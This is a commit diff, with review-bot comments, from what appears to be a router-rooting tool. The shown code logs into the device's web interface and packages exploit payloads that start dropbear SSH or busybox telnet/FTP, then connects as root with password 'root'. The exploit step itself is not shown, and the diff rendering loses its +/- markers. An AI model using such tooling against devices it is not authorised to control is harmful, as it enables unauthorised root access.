Fix detection for active SSH-server

pull/24/head
remittor 2 years ago
parent c25525938b
commit db71cd312f

@ -62,12 +62,18 @@ print("mac = {}".format(gw.mac_address))
gw.ssh_port = 122 gw.ssh_port = 122
ret = gw.detect_ssh(verbose = 1, interactive = True) ret = gw.detect_ssh(verbose = 1, interactive = True)
if ret > 0: if ret > 0:
if gw.use_ssh:
die(0, "SSH-server already installed and running") die(0, "SSH-server already installed and running")
else:
#die(0, "Telnet-server already running")
pass
use_ssh = True
stok = gw.web_login() stok = gw.web_login()
dn_tmp = 'tmp/' dn_tmp = 'tmp/'
if gw.use_ssh: if use_ssh:
dn_dir = 'data/payload_ssh/' dn_dir = 'data/payload_ssh/'
else: else:
dn_dir = 'data/payload/' dn_dir = 'data/payload/'
@ -76,7 +82,7 @@ print("Begin creating a payload for the exploit...")
fn_payload1 = 'tmp/payload1.tar.gz' fn_payload1 = 'tmp/payload1.tar.gz'
fn_payload2 = 'tmp/payload2.tar.gz' fn_payload2 = 'tmp/payload2.tar.gz'
fn_payload3 = 'tmp/payload3.tar.gz' fn_payload3 = 'tmp/payload3.tar.gz'
if gw.use_ssh: if use_ssh:
fn_pfname = 'dropbearmulti' fn_pfname = 'dropbearmulti'
else: else:
fn_pfname = 'busybox' fn_pfname = 'busybox'
@ -134,7 +140,7 @@ with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar:
tar.add(fn_pf3, arcname = os.path.basename(fn_pf3)) tar.add(fn_pf3, arcname = os.path.basename(fn_pf3))
tar.add(dn_tmp + fn_executor, arcname = fn_executor) tar.add(dn_tmp + fn_executor, arcname = fn_executor)
tar.add(dn_dir + fn_exploit, arcname = fn_exploit) tar.add(dn_dir + fn_exploit, arcname = fn_exploit)
if gw.use_ssh: if use_ssh:
tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg') tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg')
tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh') tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh')
@ -164,8 +170,9 @@ if (fn_payload3):
time.sleep(1) time.sleep(1)
if gw.use_ssh: if use_ssh:
print("Running SSH server on port {}...".format(gw.ssh_port)) print("Running SSH server on port {}...".format(gw.ssh_port))
gw.use_ssh = True
else: else:
print("Running TELNET and FTP servers...") print("Running TELNET and FTP servers...")
gw.use_ftp = True gw.use_ftp = True
@ -174,7 +181,7 @@ requests.get(gw.apiurl + "xqnetdetect/netspeed")
time.sleep(0.5) time.sleep(0.5)
gw.passw = 'root' gw.passw = 'root'
gw.ping(contimeout = 12) gw.ping(contimeout = 27)
print("") print("")
print("#### Connection to device {} is OK ####".format(gw.device_name)) print("#### Connection to device {} is OK ####".format(gw.device_name))
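Review bot: The `else:` branch added under `if ret > 0:` in the first hunk holds only a commented-out `die(0, "Telnet-server already running")` and `pass`, so when `detect_ssh` reports a running service that is not SSH the script carries on without telling the user anything. Either print a short message there or drop the branch and leave a comment such as `# a running telnet server is not a reason to stop; SSH gets installed anyway`. The new local `use_ssh = True` is never set to anything else in the visible hunks, which leaves the `else:` paths for `data/payload/`, `busybox` and the TELNET/FTP start-up unreachable as far as this page shows; if that is intended, a one-line comment next to the assignment should say so. The side of each unpaired line is inferred from the hunk counts, so this is a reading of the rendered page rather than of the file itself.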

@ -340,7 +340,7 @@ print("")
time.sleep(0.5) time.sleep(0.5)
gw.use_ssh = True gw.use_ssh = True
gw.passw = 'root' gw.passw = 'root'
ssh_en = gw.ping(verbose = 0, contimeout = 18) # RSA host key generate slowly! ssh_en = gw.ping(verbose = 0, contimeout = 30) # RSA host key generate slowly!
if ssh_en: if ssh_en:
print('#### SSH server are activated! ####') print('#### SSH server are activated! ####')
else: else:
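Review bot: The wait for the SSH server is a bare `contimeout = 30` here, while another file in this commit uses `gw.ping(contimeout = 27)` for what looks like the same start-up delay, so the two values can drift apart again the next time a slow device turns up. A named value defined in one place, for example `SSH_START_TIMEOUT = 30  # first start generates the RSA host key`, and used at both call sites would keep them in step and carry the explanation with it. The `else:` branch that handles a failed check continues outside the hunk.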

@ -500,9 +500,8 @@ class Gateway():
ip_addr = self.ip_addr ip_addr = self.ip_addr
ssh_port = self.ssh_port ssh_port = self.ssh_port
if aux_port == 0 and self.model_id > 0 and self.model_id < 22: if aux_port == 0 and self.model_id > 0 and self.model_id < 22:
if ssh_port != 122:
aux_port = 122 # exploit for "misystem/c_upload" (connect.py) aux_port = 122 # exploit for "misystem/c_upload" (connect.py)
if ssh_port == aux_port:
aux_port = 22
passw = self.passw passw = self.passw
if passw: if passw:
ret = self.check_ssh(ip_addr, ssh_port, passw, contimeout = contimeout) ret = self.check_ssh(ip_addr, ssh_port, passw, contimeout = contimeout)
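Review bot: Reading the unpaired lines as one addition (`if ssh_port != 122:`) and two removals (`if ssh_port == aux_port:` and `aux_port = 22`), `aux_port` now stays 0 whenever the caller has already set `ssh_port` to 122, and port 22 is no longer tried as a fallback. The hunk does not show how a zero `aux_port` is treated further down, so that path deserves a comment above the new condition, such as `# ssh_port is already the port opened by connect.py; no auxiliary port to probe`. The literal 122 now appears twice in this condition and again as `gw.ssh_port = 122` in the calling script, and a named constant would tie the three together. The method starts and ends outside the hunk.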
